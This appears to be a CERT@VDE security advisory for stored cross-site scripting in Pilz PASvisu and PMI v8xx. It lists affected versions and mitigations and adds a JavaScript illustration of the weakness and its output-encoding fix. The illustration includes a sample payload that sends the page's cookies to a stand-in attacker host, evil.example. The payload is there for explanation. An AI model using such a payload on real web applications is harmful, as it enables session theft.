
Pilz: Vulnerability in PASvisu and PMI v8xx

VDE-2023-050
Last update
04/10/2025 15:00
Published at
01/30/2024 08:00
Vendor(s)
Pilz GmbH & Co. KG
External ID
VDE-2023-050
CSAF Document

Summary

Multiple Pilz products are affected by stored cross-site scripting (XSS) vulnerabilities. The vulnerabilities may enable an attacker to gain full control over the system.

Update: 27.02.2024 Fix typo in advisory title

Impact

The vulnerabilities allow an attacker to inject malicious JavaScript code into the system. With PASvisu Builder, in a worst-case scenario this can lead to execution of arbitrary code with the privileges of the user running the affected software. With PASvisu Runtime (including PMI v8xx), in a worst-case scenario this could affect the controlled automation application.

Affected Product(s)

Model no.                Product name                          Affected versions
-                        PASvisu                               < 1.14.1
266807, 266812, 266815   PMI v8xx (PILZ Firmware PMI v8xx)     <= 2.0.33992

Vulnerabilities


Published
02/09/2026 08:38
Weakness
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)
Summary

A stored cross-site scripting vulnerability in the Runtime component of Pilz PASvisu before 1.14.1 and PMI v8xx up to and including 2.0.33992 allows a low-privileged remote unauthenticated attacker to manipulate process data with potential impact on integrity and/or availability.


Published
02/09/2026 08:38
Weakness
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)
Summary

A cross-site scripting vulnerability in the Builder component of Pilz PASvisu before 1.14.1 allows a local unauthenticated attacker to inject malicious JavaScript and gain full control over the device.
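Both entries are instances of CWE-79: a value that an attacker controls (a field in a project file in the Builder case, process data reaching the Runtime web interface in the other) is written into a web page without being neutralized. The following is an added illustration of that weakness pattern and of the output encoding that removes it; it is not PASvisu code and does not describe the actual injection point, and the tag names, field names and payload are constructed for the example.

```javascript
// Added example (not Pilz/PASvisu code): the generic CWE-79 pattern behind a
// stored XSS, shown as a vulnerable HTML-rendering function beside a hardened
// one. The function names, the "tag" template and the payload are assumptions
// made for illustration only.

// Constructed sample: a label an attacker has managed to store in a field that
// the visualization later renders (e.g. via a manipulated project file).
const UNTRUSTED_LABEL =
  'Pump 1<img src=x onerror="fetch(\'http://evil.example/?c=\'+document.cookie)">';

// Vulnerable: the stored value is concatenated straight into markup, so any
// '<' in it opens a new element and its script-bearing attributes run.
function renderTagVulnerable(label, value) {
  return `<div class="tag"><span class="name">${label}</span>` +
         `<span class="value">${value}</span></div>`;
}

// Encode the five characters that can change the HTML text context.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened: every untrusted value is encoded for the context it lands in
// (here: HTML text content), so the payload is displayed, not interpreted.
function renderTagSafe(label, value) {
  return `<div class="tag"><span class="name">${escapeHtml(label)}</span>` +
         `<span class="value">${escapeHtml(value)}</span></div>`;
}

// Check used to show the difference: after removing the elements that belong
// to the template itself, does any other tag remain in the output?
function containsInjectedTag(html) {
  const withoutTemplate = html.replace(/<\/?(?:div|span)(?: class="[a-z]+")?>/g, '');
  return /<[a-z!/?]/i.test(withoutTemplate);
}

// Stand-alone demonstration of both renderers on the constructed payload.
console.log('vulnerable output injects a tag:', containsInjectedTag(renderTagVulnerable(UNTRUSTED_LABEL, 42)));
console.log('hardened output injects a tag:  ', containsInjectedTag(renderTagSafe(UNTRUSTED_LABEL, 42)));
```

The encoding shown is correct only for values placed into HTML text content; a value that ends up inside an attribute, a URL or a script block needs the encoding for that context, and a template engine or DOM API (`textContent` rather than `innerHTML`) that applies it automatically is preferable to hand-rolled escaping. For the Runtime case the advisory's mitigations (firewalling the interface and password-protecting the online project) reduce who can reach the injection point but do not change the rendering behaviour; only the fixed version does.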


Mitigation

  • Only use project files from trustworthy sources.
  • Protect project files against modification by unauthorized users.
  • PASvisu Runtime: Limit network access to legitimate connections by using a firewall or similar measures. Use password protection on the online project.

Remediation

Install the fixed product version as soon as it is available. Please visit the Pilz eShop (https://www.pilz.com/en-INT/eshop) to check for the fixed version.

Acknowledgments

Pilz GmbH & Co. KG thanks the following parties for their efforts:

Revision History

Version   Date               Summary
1         01/30/2024 08:00   Initial revision.
2         02/27/2024 15:00   Updated title.
3         11/06/2024 12:27   Fix: corrected certvde domain, added self-reference.
4         04/10/2025 15:00   Fixed version operators.